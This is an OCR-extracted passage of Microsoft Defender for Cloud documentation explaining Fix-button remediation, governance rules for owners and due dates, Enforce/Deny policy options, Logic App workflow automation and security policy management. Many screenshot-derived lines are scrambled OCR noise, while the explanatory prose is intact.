High 30 Min 75 Credential A 1 
| © i) View all exemptions E, beak 


Note: After the process completes, it may take up to 30 min until your resources move to the ‘healthy resources’ tab. 


Quick fix logic 


Manual remediation; 


To enable secure transfer required: 


1. In your storage account, go to the ‘Configuration’ page. 


2. Enable ‘Secure transfer required’. 


= 
Ze E 
Was this recommendation useful? () Yes () No 


3. Once completed, a notification appears informing you whether the issue is 
resolved. 


Fix button 


To simplify remediation and improve your environment's security (and increase your 
secure score), many recommendations include a Fix option. 


Fix helps you quickly remediate a recommendation on multiple resources. 


To implement a Fix: 


1. From the list of recommendations that have the Fix action icon A , select a 


recommendation. 


= Microsoft Defender for Cloud | Recommendations 


Showing 11 subscriptions 


$) Refresh 


Secure score recommendations All recommendations 


\ Enable encrypti... d 1.96 DU + 5% 
Virtual mach... 

Transparent ... 

DynamoDB ... 

RDS cluster s... 

SNS topics s.. 


Attached EB... 


d Download CSV report ` Open query 4) Governance report (preview) 


A? Guides & Feedback 


Overdue 

Completed 
Completed 
Unassigned 
Unassigned 
Unassigned 


Overdue 


146 of 397 resources 
E 0 of 38 virtual machines 


B 0 of 12 SQL databases =a 


© 10f 4 AWS Dax Cluster Br 


EE 


| 9of12 AWS SNS Topic PTE 


3 of 33 resources © E 


® 99 of 241 AWS EC2 Volu... mmm 


2. From the Unhealthy resources tab, select the resources that you want to 


implement the recommendation on, and select Fix. 


©® Note 


Some of the listed resources might be disabled, because you don't have the 


appropriate permissions to modify them. 


3. In the confirmation box, read the remediation details and implications. 


CloudFront distributions should require encryption in transit 


© Exempt v Open query 


Severity Freshness interval Tactics and techniques 

| Medium O) 6 Hours dda Discovery +2 
(m) Name N AWS Account Connector name Region Resource type 
© EADHFPDYLPSGI 102614528198 securityConnector global AWS CloudFront dist... 
I  EIHOYFML2LHS1D 102614528198 securityConnector global AWS CloudFront dist... 
JU GO EICRCDWYBJE4DE 102614528198 securityConnector global AWS CloudFront dist... 
TI ZG EO OAINMIDTTE AIZTONDO OTZ AEOOOOO os rib dien geben alabal MMC Glen siten dict 
Fix | Trigger logic app | | Exempt | | Assign owner Change owner and set ETA © 


Was this recommendation useful? © Yes Q No 


O Note 


The implications are listed in the grey box in the Fixing resources window that 
opens after clicking Fix. They list what changes happen when proceeding with 
the Fix. 


Fixing resources x 


Fix 1 resource 


Enable encryption in transit on selected CloudFront distributions 
Parameters 


Viewer protocol policy * 
(@) HTTPS only (C) Redirect HTTP to HTTPS 


Selected resources 


© aws-cloudfront-distribution-e1hoyfml2|hs1d 


Download remediation logic for 1 resource Cancel ` 


4. Insert the relevant parameters if necessary, and approve the remediation. 


O Note 


It can take several minutes after remediation completes to see the resources 
in the Healthy resources tab. To view the remediation actions, check the 
activity log. 


5. Once completed, a notification appears informing you if the remediation 
succeeded. 


Fix actions logged to the activity log 


The remediation operation uses a template deployment or REST API PATCH request to 


apply the configuration on the resource. These operations are logged in Azure activity 


log. 


Next steps 


In this document, you were shown how to remediate recommendations in Defender for 
Cloud. To learn how recommendations are defined and selected for your environment, 
see the following page: 


e What are security policies, initiatives, and recommendations? 


Drive remediation with security 
governance 


Article e 03/30/2023 


Security teams are responsible for improving the security posture of their organizations 
but they may not have the resources or authority to actually implement security 
recommendations. Assigning owners with due dates and defining governance rules 
creates accountability and transparency so you can drive the process of improving the 


security posture in your organization. 


Stay on top of the progress on the recommendations in the security posture. Weekly 
email notifications to the owners and managers make sure that they take timely action 


on the recommendations that can improve your security posture and recommendations. 


You can learn more by watching this video from the Defender for Cloud in the Field 
video series: 


e Remediate Security Recommendations with Governance 


Building an automated process for improving 
security with governance rules 


To make sure your organization is systematically improving its security posture, you can 
define rules that assign an owner and set the due date for resources in the specified 
recommendations. That way resource owners have a clear set of tasks and deadlines for 
remediating recommendations. 


You can then review the progress of the tasks by subscription, recommendation, or 
owner so you can follow up with tasks that need more attention. 


Availability 


Aspect Details 
Release state: General availability (GA) 
Prerequisite: Requires the Defender Cloud Security Posture Management (CSPM) 


plan to be enabled. 


Required roles and Azure - Contributor, Security Admin, or Owner on the subscription 
permissions: AWS, GCP — Contributor, Security Admin, or Owner on the connector 


Aspect Details 


Clouds: © Commercial clouds 
* National (Azure Government, Azure China 21Vianet) 
Lv] Connected AWS accounts 
Lv] Connected GCP accounts 


O Note 


Starting January 1, 2023, governance capabilities will require Defender Cloud 
Security Posture Management (CSPM) plan enablement. Customers deciding to 
keep Defender CSPM plan off on scopes with governance content: 


e Existing assignments remain as is and continue to work with no customization 
option or ability to create new ones. 


e Existing rules will remain as is but won't trigger new assignments creation. 


Defining governance rules to automatically set the owner 
and due date of recommendations 


Governance rules can identify resources that require remediation according to specific 
recommendations or severities. The rule assigns an owner and due date to ensure the 
recommendations are handled. Many governance rules can apply to the same 
recommendations, so the rule with lower priority value is the one that assigns the owner 
and due date. 


The due date set for the recommendation to be remediated is based on a timeframe of 
7, 14, 30, or 90 days from when the recommendation is found by the rule. For example, 
if the rule identifies the resource on March 1 and the remediation timeframe is 14 days, 
March 15 is the due date. You can apply a grace period so that the resources that 's 
given a due date don't affect your secure score until they're overdue. 


You can also set the owner of the resources that are affected by the specified 
recommendations. In organizations that use resource tags to associate resources with an 
owner, you can specify the tag key and the governance rule reads the name of the 


resource owner from the tag. 


The owner is shown as unspecified when the owner wasn't found on the resource, the 
associated resource group, or the associated subscription based on the specified tag. 


Home > Microsoft Defender for Cloud 


t+] Microsoft Defender for Cloud | Security posture x 
Showing 11 subscriptions 

[2 search | E secure score over time E Governance report (preview) E Guides & Feedback 

General 


Secure score Environment Governance (preview) 


19 total 
2 Recommendations EO e 100/115 
O azure 82% 7 
Ọ security alerts I Subscriptions | Accounts 4 Il Projects 4 Overdue recommendations © 
€ & Aws 28% 
@ inventory ZE 
& SEE 28% v= A 
x 
Cloud Security Explorer (Preview) To 888/1399 Y= 191 © A SO 19/1 19 
Unhealthy resources Recommendations Attack paths signed rer endations © 
@ Workbooks. pi Unassigned recommendations 
e Communi ity 
Diagnose and solve problems 
d diag d Environment Owner (preview) 
Cloud Security 
p h Owner == None X Recommendati ity == None 
© Security posture 
@ Regulatory compliance 4 Overdue recommendations A Affected resources TA Recommendations 


Q workload protections 
E% Firewall Manager 


E DevOps Security (Preview) 


aj 


Management 


By default, email notifications are sent to the resource owners weekly to provide a list of 
the on time and overdue tasks. If an email for the owner's manager is found in the 
organizational Azure Active Directory (Azure AD), the owner's manager receives a 
weekly email showing any overdue recommendations by default. 


EZ Create governance rule x 
Governance 
© General details D Conditions 
+ Add governance rule C) Refresh Lo Governance report (preview) E Guides & Feedback 
Impacted recommendations * 
Status : Enabled Y Add filter 
Rule name Environment Scope Priority Affected recommendations 
Remediate AWS database issues Aws Bil CSPM-Demo-1 


on GCP production projects Æ GCP 


dentity recommendations OAure 


igured settings on Windows VMs OaAure 


Enable diagnostic logs on ERP subscriptions GEO ô) ERP Prod 


To define a governance rule that assigns an owner and due date: 
1. Navigate to Environment settings > Governance rules. 
2. Select Create governance rule. 
3. Enter a name for the rule. 


4. Select a scope to apply the rule to and use exclusions if needed. Rules for 
management scope (Azure management groups, AWS master accounts, GCP 
organizations) are applied prior to the rules on a single scope. 


5. Priority is assigned automatically after scope selection. You can override this field if 
needed. 


6. Select the recommendations that the rule applies to, either: 


e By severity - The rule assigns the owner and due date to any 
recommendation in the subscription that doesn't already have them 
assigned. 

e By specific recommendations - Select the specific recommendations that the 


rule applies to. 
7. Set the owner to assign to the recommendations either: 


e By resource tag - Enter the resource tag on your resources that defines the 
resource Owner. 
e By email address - Enter the email address of the owner to assign to the 


recommendations. 


8. Set the remediation timeframe, which is the time between when the resources are 
identified to require remediation and the time that the remediation is due. 


9. If you don't want the resources to affect your secure score until they're overdue, 
select Apply grace period. 


10. If you don't want either the owner or the owner's manager to receive weekly 
emails, clear the notification options. 


11. Select Create. 


If there are existing recommendations that match the definition of the governance rule, 
you can either: 


e Assign an owner and due date to recommendations that don't already have an 
owner or due date. 
e Overwrite the owner and due date of existing recommendations. 


© Note 


When you delete or disable a rule, all existing assignments and notifications will 


remain. 


Q Tip 


Here are some sample use-cases for the at-scale experience: 


e View and manage all governance rules effective in the organization using a 
single page. 

e Create and apply rules on multiple scopes at once using management scopes 
cross cloud. 


e Check effective rules on selected scope using the scope filter. 


To view the effect of rules on a specific scope, use the Scope filter to select a specific 
scope. 


Conflicting rules are applied in priority order. For example, rules on a management 
scope (Azure management groups, AWS accounts and GCP organizations), take effect 
before rules on scopes (for example, Azure subscriptions, AWS accounts, or GCP 
projects). 


Manually assigning owners and due dates for 
recommendation remediation 


For every resource affected by a recommendation, you can assign an owner and a due 
date so that you know who needs to implement the security changes to improve your 
security posture and when they're expected to do it by. You can also apply a grace 
period so that the resources that 's given a due date don't affect your secure score 
unless they become overdue. 


To manually assign owners and due dates to recommendations: 
1. Go to the list of recommendations: 


e In the Defender for Cloud overview, select Security posture and then select 
View recommendations for the environment that you want to improve. 


e Go to Recommendations in the Defender for Cloud menu. 


2. In the list of recommendations, use the Potential score increase to identify the 
security control that contains recommendations that will increase your secure 


score. 


Q Tip 


You can also use the search box and filters above the list of recommendations 
to find specific recommendations. 


3. Select a recommendation to see the affected resources. 


4. For any resource that doesn't have an owner or due date, select the resources and 
select Assign owner. 


5. Enter the email address of the owner that needs to make the changes that 
remediate the recommendation for those resources. 


6. Select the date by which to remediate the recommendation for the resources. 


7. You can select Apply grace period to keep the resource from affecting the secure 
score until it's overdue. 


8. Select Save. 


The recommendation is now shown as assigned and on time. 


Tracking the status of recommendations for 
further action 


After you define governance rules, you'll want to review the progress that the owners 
are making in remediating the recommendations. 


You can track the assigned and overdue recommendations in: 


e The security posture shows the number of unassigned and overdue 
recommendations. 


9 Security posture 


Recommendations 
ZZ 285 Zra 95% EZ, 56% 
Total Overdue Unassigned 


Secure score 


58% 


36% 30% 


O Azure 
[R] 
© aws 

R — Ew 

GN GCP 


23% 
E 


Explore your security posture > 


e The list of recommendations shows the governance status of each 
recommendation. 


Home > Microsoft Defender for Cloud 


g= Microsoft Defender for Cloud | Recommendations ~~ x 
ETT showing 79 subscriptions 
[e Search (Ctrl+/) « © Refresh 4 Download CSV report TZ Open query EI Governance report (preview) ZG Guides & Feedback 
General D One subscription doesn’t have the default policy assigned. To review the list of subscriptions, open the Security Policy page. 
© overview 
@ Getting started Secure score recommendations AI recommendations 
ZZ Recommendations @ Azure @ aws @ scr 
@ security alerts Secure score © Active items Resource health 
Ea inventory 9 36% Controls Recommendations — 
E 15/5 73/356 1 1 i 
@ Workbooks Unhealthy (3439) Healthy (1387) Not applicable (293) 
GO Community 


Governance (preview) 
@ Diagnose and solve problems (P ) 


Overdue recommendations pe 21923 © 

Cloud Security Unassigned recommendations ba 160/285 © 
© Security posture 
@ Regulatory compliance Show my items only (preview): (@ | Off 
Ọ Workload protections [9 Search recommendations Recommendation status == All X 
E Firewall Manager 
Hita © Name Ty Max score ‘J Current score T4 Potential score increase T4 Status TY Unhealthy resources Insights 
{i} -Eovironimene settings > Enable MFA 10 243 GOL + 10% © Overdue 9 of 23 resources 
HE Security solutions > secure manage... 8 + 5% © Overdue 87 of 208 resources 
GO Workflow automation > Apply systemu.. 6 +2% e Overdue 79 of 241 resources 

> Remediate vuln... 6 + 2% © Overdue 126 of 173 resources 

> Remediate secur... 4 + 11% © Overdue 654 of 926 resources 

> Restrict unautho... 4 + 10% © Overdue 685 of 1311 resources 

> Encrypt data int... 4 +7% © Overdue 238 of 519 resources 


> Manage access.. 4 297 BBU +3% © Overdue 307 of 1515 resources 


4 


e The governance report in the governance rules settings lets you drill down into 


recommendations by rule and owner. 


Home > Microsoft Defender for Cloud 


Workbook1 a 


i Workbooks d Edit GO Ż © 7 Hep D Auto refresh: oF 


Governance (Preview) 


Subscription 
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Tracking progress by rule with the governance report 


The governance report lets you select subscriptions that have governance rules and, for 
each rule and owner, shows you how many recommendations are completed, on time, 
overdue, or unassigned. 

© Note 

Manual assignments will not appear on this report. To see all assignments by 

owner, use the Owner tab on the Security Posture page. 


To review the status of the recommendations in a rule: 


1. In Recommendations, select Governance report. 
2. Select the subscriptions that you want to review. 
3. Select the rules that you want to see details about. 


You can see the list of owners and recommendations for the selected rules, and their 
status. 


To see the list of recommendations for each owner: 
1. Select Security posture. 


2. Select the Owner tab to see the list of owners and the number of overdue 
recommendations for each owner. 


e Hover over the (i) in the overdue recommendations to see the breakdown of 
overdue recommendations by severity. 


e I the owner email address is found in the organizational Azure Active 
Directory (Azure AD), you'll see the full name and picture of the owner. 


3. Select View recommendations to go to the list of recommendations associated 


with the owner. 


Next steps 


In this article, you learned how to set up a process for assigning owners and due dates 
to tasks so that owners are accountable for taking steps to improve your security 
posture. 


Check out how owners can set ETAs for tasks so that they can manage their progress. 


Learn how to Implement security recommendations in Microsoft Defender for Cloud. 


Prevent misconfigurations with 
Enforce/Deny recommendations 


Article e 07/24/2023 


Security misconfigurations are a major cause of security incidents. Defender for Cloud 
can help prevent misconfigurations of new resources regarding specific 


recommendations. 
This feature can help keep your workloads secure and stabilize your secure score. 


Enforcing a secure configuration, based on a specific recommendation, is offered in two 


modes: 


e Using the Deny effect of Azure Policy, you can stop unhealthy resources from 


being created. 


e Using the Enforce option, you can take advantage of Azure Policy's 
DeploylfNotExist effect and automatically remediate non-compliant resources 


upon creation. 


The ability to secure configurations can be found at the top of the resource details page 
for selected security recommendations (see Recommendations with deny/enforce 


options). 


Prevent resource creation 


1. Open the recommendation that your new resources must satisfy, and select the 
Deny button at the top of the page. 


Secure transfer to storage accounts should be enabled x 


Severity Freshness interval 
| High (Q) 30 Min 
v Description 


w Remediation steps 


^ Affected resources 


Unhealthy resources (102) Healthy resources (166) Not applicable resources (0) 


| Ø Search storage accounts 


O Name My Subscription 
O Se windevs196 DS-ThreatDetection Demo R&D_60843 
O E vateststore DS-ThreatDetection Demo_R&D_60843 


The configuration pane opens listing the scope options. 


2. Set the scope by selecting the relevant subscription or management group. 


@ Tip 


You can use the three dots at the end of the row to change a single 
subscription, or use the checkboxes to select multiple subscriptions or groups 
then select Change to Deny. 


Deny - Prevent resource creation (Preview) x 
Secure ti 41 subscriptions 


Set the scope for the deny effect of your Azure Policy. The deny effect 
© Deny prevents the creation of resources that don't satisfy the recommendation. 
Learn more about the Azure Policy deny effect. 


ed pe D [4] Contoso (5 of 5 subscriptions) Deny 
| v PA \pplic: ' Change to audit dy 
v [4] 
v Descripti ia l ) 
v Remedia ? i i Audit 
^ Affected v Jo] 
? T Audit 
Unhealt 
v PA 
| J Searc 
v PA 
C] Nat 
m = ? Audit 


Was this rı Change to Deny 


Enforce a secure configuration 


1. Open the recommendation that you'll deploy a template deployment for if new 
resources don't satisfy it, and select the Enforce button at the top of the page. 


Auditing on SQL server should be enabled & 


© Enforce 


Severity Freshness interval 
| High (2) 30 Min 
w Description 


w Remediation steps 


^ Affected resources 


Unhealthy resources (26) Healthy resources (21) Not applicable resources (0) 


| Ø Search SQL servers 


[_] Name Ty Subscription 

JA E. rsvr DS-ThreatDetection_Demo_R... EE 

JA E auditserver DS-ThreatDetection Demo_R... °** 

JA E. mosrv DS-ThreatDetection_Demo_R... EET 

JA E. security-demo-server DS-ThreatDetection_Demo_R... EEI 
Remediate Trigger Logic App 


The configuration pane opens with all of the policy configuration options. 


Deploy Auditing on SQL servers & 


Assign policy 


Basics Parameters Remediation Review + create 


Scope 
Scope Learn more about setting the scope * 


Exclusions 


Optionally select resources to exclude from the po... 


Basics 
Policy definition 
Dep yy Auditing n SOL se 


Assignment name* © 


Deploy Auditing on SQL servers 


Description 


Policy enforcement © 


( GEO Disabled ) 


2. Set the scope, assignment name, and other relevant options. 


3. Select Review + create. 


Recommendations with deny/enforce options 
These recommendations can be used with the deny option: 


e [Enable if required] Azure Cosmos DB accounts should use customer-managed 
keys to encrypt data at rest 

e [Enable if required] Azure Machine Learning workspaces should be encrypted with 
a customer-managed key (CMK) 


[Enable if required] Cognitive Services accounts should enable data encryption 
with a customer-managed key (CMK) 

[Enable if required] Container registries should be encrypted with a customer- 
managed key (CMK) 

Access to storage accounts with firewall and virtual network configurations should 
be restricted 

Automation account variables should be encrypted 

Azure Cache for Redis should reside within a virtual network 

Azure Spring Cloud should use network injection 

Container CPU and memory limits should be enforced 

Container images should be deployed from trusted registries only 

Container with privilege escalation should be avoided 

Containers sharing sensitive host namespaces should be avoided 

Containers should only use allowed AppArmor profiles 

Immutable (read-only) root filesystem should be enforced for containers 

Key Vault keys should have an expiration date 

Key Vault secrets should have an expiration date 

Key vaults should have purge protection enabled 

Key vaults should have soft delete enabled 

Least privileged Linux capabilities should be enforced for containers 

Privileged containers should be avoided 

Redis Cache should allow access only via SSL 

Running containers as root user should be avoided 

Secure transfer to storage accounts should be enabled 

Service Fabric clusters should have the ClusterProtectionLevel property set to 
EncryptAndSign 

Service Fabric clusters should only use Azure Active Directory for client 
authentication 

Services should listen on allowed ports only 

Storage account public access should be disallowed 

Storage accounts should be migrated to new Azure Resource Manager resources 
Storage accounts should restrict network access using virtual network rules 
Usage of host networking and ports should be restricted 

Usage of pod HostPath volume mounts should be restricted to a known list to 
restrict node access from compromised containers 

Validity period of certificates stored in Azure Key Vault should not exceed 12 
months 

Virtual machines should be migrated to new Azure Resource Manager resources 
Web Application Firewall (WAF) should be enabled for Application Gateway 


e Web Application Firewall (WAF) should be enabled for Azure Front Door Service 
service 


These recommendations can be used with the enforce option: 


e Auditing on SQL server should be enabled 

e Azure Arc-enabled Kubernetes clusters should have Microsoft Defender for Cloud's 
extension installed 

e Azure Backup should be enabled for virtual machines 

e Microsoft Defender for App Service should be enabled 

e Microsoft Defender for container registries should be enabled 

e Microsoft Defender for Key Vault should be enabled 

e Microsoft Defender for Kubernetes should be enabled 

e Microsoft Defender for Resource Manager should be enabled 

e Microsoft Defender for Servers should be enabled 

e Microsoft Defender for Azure SQL Database servers should be enabled 

e Microsoft Defender for SQL servers on machines should be enabled 

e Microsoft Defender for SQL should be enabled for unprotected Azure SQL servers 

e Microsoft Defender for Storage should be enabled 

e Azure Policy Add-on for Kubernetes should be installed and enabled on your 
clusters 

e Diagnostic logs in Azure Stream Analytics should be enabled 

e Diagnostic logs in Batch accounts should be enabled 

e Diagnostic logs in Data Lake Analytics should be enabled 

e Diagnostic logs in Event Hub should be enabled 

e Diagnostic logs in Key Vault should be enabled 

e Diagnostic logs in Logic Apps should be enabled 

e Diagnostic logs in Search services should be enabled 

e Diagnostic logs in Service Bus should be enabled 


Next steps 


Automate responses to Microsoft Defender for Cloud triggers 


Automate responses to Microsoft 
Defender for Cloud triggers 


Article e 06/18/2023 


Every security program includes multiple workflows for incident response. These 
processes might include notifying relevant stakeholders, launching a change 
management process, and applying specific remediation steps. Security experts 
recommend that you automate as many steps of those procedures as you can. 
Automation reduces overhead. It can also improve your security by ensuring the process 
steps are done quickly, consistently, and according to your predefined requirements. 


This article describes the workflow automation feature of Microsoft Defender for Cloud. 
This feature can trigger consumption logic apps on security alerts, recommendations, 
and changes to regulatory compliance. For example, you might want Defender for Cloud 
to email a specific user when an alert occurs. You'll also learn how to create logic apps 
using Azure Logic Apps. 


Availability 


Aspect Details 
Release state: General availability (GA) 
Pricing: Free 


Required roles Security admin role or Owner on the resource group 

and Must also have write permissions for the target resource 

permissions: 
To work with Azure Logic Apps workflows, you must also have the following 
Logic Apps roles/permissions: 
- Logic App Operator permissions are required or Logic App read/trigger access 
(this role can't create or edit logic apps; only run existing ones) 
- Logic App Contributor permissions are required for logic app creation and 
modification 
If you want to use Logic Apps connectors, you may need other credentials to 
sign in to their respective services (for example, your Outlook/Teams/Slack 
instances) 


Clouds: © Commercial clouds 
© National (Azure Government, Azure China 21Vianet) 


Create a logic app and define when it should 
automatically run 


1. From Defender for Cloud's sidebar, select Workflow automation. 


Home > Microsoft Defender for Cloud 


ZG Microsoft Defender for Cloud | Workflow automation 
rowing subseintion "ASC DEMC 


+ Add werkfow automation D Relresh Delete © team more AP Guides & Feedback 


Filter by name P Selecte.. Enablem D. Security aler.. 


TL Scope T4 Trigger Type Th Description 


NewDesignTastRecsPradWEU2 
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From this page you can create new automation rules, enable, disable, or delete 


existing ones. 


© Note 


A scope refers to the subscription where the workflow automation is 


deployed. 


2. To define a new workflow, select Add workflow automation. The options pane for 


your new automation opens. 


Home > Micrasoft Defender for Cloud Add workflow automation 
ZG Microsoft Defender for Cloud | Workflow automation 
urr ‘ASC DEMO 


Ta Tigger Type 


ASC DEMO 


Here you can enter: 


a. Aname and description for the automation. 


b. The triggers that will initiate this automatic workflow. For example, you might 
want your logic app to run when a security alert that contains "SQL" is 


generated. 
© Note 


If your trigger is a recommendation that has "sub-recommendations", for 
example Vulnerability assessment findings on your SQL databases should 
be remediated, the logic app will not trigger for every new security finding; 
only when the status of the parent recommendation changes. 


c. The consumption logic app that will run when your trigger conditions are met. 


3. From the Actions section, select visit the Logic Apps page to begin the logic app 
creation process. 


Alert severity * 


| All severities selected Vv 


Actions 
Configure the Logic App that will be triggered 
Choose an existing Logic App of visit the Logic Apps pageffo create a new one 
Show Logic App instances from the following subscriptions * 
ASC DEMO Vv 


Logic App name © 
Select a logic app Vv 
Refresh 


You'll be taken to Azure Logic Apps. 


4. Select (+) Add. 


Home > Logik apps 


Create Logic App 


Basics Hosting Monitorning Tags Review + creste 


Project Details 


Select a subscription to manage deployed resources and costs. Lie resource groups like folders ta ceganize ard manage 
31 your resour 
S ubscriptice © 
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5. Fill out all required fields and select Review + Create. 


The message Deployment is in progress appears. Wait for the deployment 
complete notification to appear and select Go to resource from the notification. 


6. Review the information you entered and select Create. 


In your new logic app, you can choose from built-in, predefined templates from 
the security category. Or you can define a custom flow of events to occur when 
this process is triggered. 


Ọ Tip 


Sometimes in a logic app, parameters are included in the connector as part of 
a string and not in their own field. For an example of how to extract 


parameters, see step #14 of Working with logic app parameters while 
building Microsoft Defender for Cloud workflow automations Z . 


The logic app designer supports the following Defender for Cloud triggers: 


e When a Microsoft Defender for Cloud Recommendation is created or 
triggered - If your logic app relies on a recommendation that gets 
deprecated or replaced, your automation will stop working and you'll need to 
update the trigger. To track changes to recommendations, use the release 
notes. 


e When a Defender for Cloud Alert is created or triggered - You can 
customize the trigger so that it relates only to alerts with the severity levels 
that interest you. 


e When a Defender for Cloud regulatory compliance assessment is created or 
triggered - Trigger automations based on updates to regulatory compliance 


assessments. 


O Note 


If you are using the legacy trigger "When a response to a Microsoft Defender 
for Cloud alert is triggered", your logic apps will not be launched by the 
Workflow Automation feature. Instead, use either of the triggers mentioned 
above. 


OEE 
e EO 


7. After you've defined your logic app, return to the workflow automation definition 
pane ("Add workflow automation"). Select Refresh to ensure your new logic app is 


available for selection. 


Actions 
Configure the Logic App that will be triggered. 
Choose an existing Logic App or visit the Logic Apps page to create a new one 


Show Logic App instances from the following subscriptions * 


| ASC DEMO v 


Logic App name © 


+ 


8. Select your logic app and save the automation. The logic app dropdown only 
shows those with supporting Defender for Cloud connectors mentioned above. 


Manually trigger a logic app 


You can also run logic apps manually when viewing any security alert or 


recommendation. 


To manually run a logic app, open an alert, or a recommendation and select Trigger 


logic app: 


= Microsoft Azure D Search resources, services, and docs (G+/) Se fh as? O 


Home > Microsoft Defender for Cloud- Security alerts > PREVIEW - Role binding to the cluster-admin role detected > PREVIEW - Role binding to the cluster-admin role detected 


PREVIEW - Role binding to the cluster-admin role detected x 


ASC-IGNITE-DEMO 


KO Learn more 


/N General information 


Kubernetes audit log analysis detected a new binding to the cluster-admin role 
which gives administrator privileges. 


IEE Unnecessary administrator privileges might cause privilege escalation in the cluster. 

ACTIVITY TIME Tuesday, October 29, 2019, 3:06:26 PM 

SEVERITY @ Low 

STATE Active 

ATTACKED RESOURCE ASC-IGNITE-DEMO 

SUBSCRIPTION ASC DEMO (214bd26) 

DETECTED BY EE Microsoft 

ACTION TAKEN Natartad = 


Was this useful? © Yes © No 


ee 


| Trigger Logic App 


Configure workflow automation at scale using 
the supplied policies 


Automating your organization's monitoring and incident response processes can greatly 
improve the time it takes to investigate and mitigate security incidents. 


To deploy your automation configurations across your organization, use the supplied 
Azure Policy 'DeploylfNotExist' policies described below to create and configure 


workflow automation procedures. 
Get started with workflow automation templates £. 
To implement these policies: 


1. From the table below, select the policy you want to apply: 


Goal Policy Policy ID 
Workflow automation for Deploy Workflow Automation for £1525828-9a90- 
security alerts Microsoft Defender for Cloud alerts 7 Afcf-be48- 


268cdd02361e 


Goal Policy Policy ID 


Workflow automation for Deploy Workflow Automation for 73d6ab6c-2475- 
security Microsoft Defender for Cloud 4850-afd6- 
recommendations recommendations E 43795f3492ef 
Workflow automation for Deploy Workflow Automation for 509122b9-ddd9- 
regulatory compliance Microsoft Defender for Cloud regulatory 47ba-a5f1- 
changes compliance 7 d0dac20be63c 


Q Tip 


You can also find these by searching Azure Policy: 


a. Open Azure Policy. 


Microsoft Azure Ø policy x 


Dashboard > Microsoft Defen Services 


4 ‘ po 
A Ea EZ i 


| & Search (Ctri+/) E service endpoint policies 


EŒ Firewall Policies 


b. From the Azure Policy menu, select Definitions and search for them by 


name. 


2. From the relevant Azure Policy page, select Assign. 


Deploy Workflow Automation for Microsoft Defender for Cloud recommendations 


Policy definition 
t def D Duplicate definition t t GO Export definition 
A Essentials 
Name : Deploy Workflow Automation for Microsoft Defender for Cloud recommendations 
Description : Enable automation of Microsoft Defender for Cloud recommendations. This policy deploys a workflow automation with your conditions and triggers on the assigned scope. To deploy this po... 


Available Effects : DeploylfNotExists 


Category : Security Center 


Definition Assignments (0) Parameters 


£ 
"properties": { 
"displayName": "Deploy Workflow Automation for Microsoft Defender for Cloud recommendations", 
“policyType": "BuiltIn", 
"mode": “All”, 
“description”: "Enable automation of Microsoft Defender for Cloud recommendations. This policy deploys a workflow automation with your conditions 
"metadata": { 
"version": "5.0.0", 
"category": "Security Center" 


b 


Seg SO wne 


OO 


3. Open each tab and set the parameters as desired: 
a. In the Basics tab, set the scope for the policy. To use centralized management, 
assign the policy to the Management Group containing the subscriptions that 

will use the workflow automation configuration. 


b. In the Parameters tab, enter the required information. 


Deploy Workflow Automation for Microsoft Defender for Cloud recommendations 


Assign policy 


Basics Parameters Remediation Non-compliance messages Review + create 


Search by para... | @ Only show parameters that need input or review 


Automation name * © 


Resource group name * © 


Resource group location * © 


Logic App* © 


Logic app trigger* © 


a. (Optional), Apply this assignment to an existing subscription in the Remediation 
tab and select the option to create a remediation task. 


4. Review the summary page and select Create. 


Data types schemas 


To view the raw event schemas of the security alerts or recommendations events passed 
to the logic app, visit the Workflow automation data types schemas £ . This can be useful 
in cases where you aren't using Defender for Cloud's built-in Logic Apps connectors 
mentioned above, but instead are using the generic HTTP connector - you could use the 
event JSON schema to manually parse it as you see fit. 


Next steps 


In this article, you learned about creating logic apps, automating their execution in 
Defender for Cloud, and running them manually. For more information, see the 
following documentation: 


e Use workflow automation to automate a security response 
e Security recommendations in Microsoft Defender for Cloud 
e Security alerts in Microsoft Defender for Cloud 

e Workflow automation data types schemas 7 

e Check out common questions about Defender for Cloud. 


Manage security policies 


Article e 03/30/2023 


This page explains how security policies are configured, and how to view them in 
Microsoft Defender for Cloud. 


To understand the relationships between initiatives, policies, and recommendations, see 
What are security policies, initiatives, and recommendations? 


Who can edit security policies? 


Defender for Cloud uses Azure role-based access control (Azure RBAC), which provides 
built-in roles you can assign to Azure users, groups, and services. When users open 
Defender for Cloud, they see only information related to the resources they can access. 
Which means users are assigned the role of owner, contributor, or reader to the 
resource's subscription. There are two specific Defender for Cloud roles that can view 
and manage security policies: 


e Security reader: Has rights to view Defender for Cloud items such as 
recommendations, alerts, policy, and health. Can't make changes. 

e Security admin: Has the same view rights as security reader. Can also update the 
security policy and dismiss alerts. 


You can edit Azure security policies through Defender for Cloud, Azure Policy, via REST 
API or using PowerShell. 


Manage your security policies 


To view your security policies in Defender for Cloud: 


1. From Defender for Cloud's menu, open the Environment settings page. Here, you 
can see the Azure management groups or subscriptions. 


2. Select the relevant subscription or management group whose security policies you 


want to view. 
3. Open the Security policy page. 


4. The security policy page for that subscription or management group appears. It 
shows the available and assigned policies. 


Home > Microsoft Defender for Cloud | Environment settings > Settings 


@: Settings | Security policy 


7 CyberSecSOC 


[© Search | « Security policy on: CyberSecSOC 


Settings initiatives enabled on this subscription 


©) Defender plans eee 
p ^ Default initiative 
® Email notifications 


Tó Workflow automation 
The default initiative enabled on your subscription generates the security recommendations in the Recommendations page. 
© Integrations 


E Continuous export Assignment Assigned On Audit policies Deny policies Disabled policies Exempted polici... 
Policy settings ASC Default (subscription: d... ? Subscription 195 1 12 0 
©: Security policy [Preview]: Enable Monitorin... [x] Management group 193 0 15 0 


®© Governance rules 


boi Industry & regulatory standards 


Compliance initiatives shown in the Regulatory compliance dashboard. 


Microsoft cloud security Track Microsoft Cloud Security Out of the box 

benchmark Benchmark controls in the ee 
Compliance Dashboard, based on a Disable 
recommended set of policies and 
assessments. 


PCI DSS 3.2.1 Track PCI-DSS v3.2.1:2018 controls Out of the box b, 
in the Compliance Dashboard, 


Disable 
based on a recommended set of : 


policies and assessments. 


O Note 


The settings of each recommendation that apply to the scope are compared 
and the cumulative outcome of actions taken by the recommendation 
appears. For example, if in one assignment, a recommendation is Disabled, 
but in another it's set to Audit, then the cumulative effect applies Audit. The 
more active effect always takes precedence. 


5. Choose from the available options on this page: 


a. To work with industry standards, select Add more standards. For more 
information, see Customize the set of standards in your regulatory compliance 
dashboard. 


b. To assign and manage custom initiatives, select Add custom initiatives. For 
more information, see Using custom security initiatives and policies. 


c. To view and edit the default initiative, select it and proceed as described below. 


Home > Microsoft Defender for Cloud | Environment settings > Settings 


@: Settings | Security policy 
“" ASC Multi-Cloud Demo 
© Search « 
EEEak Security policy on: ASC Multi-Cloud Demo 
Settings 


= initiatives enabled on this subscription 
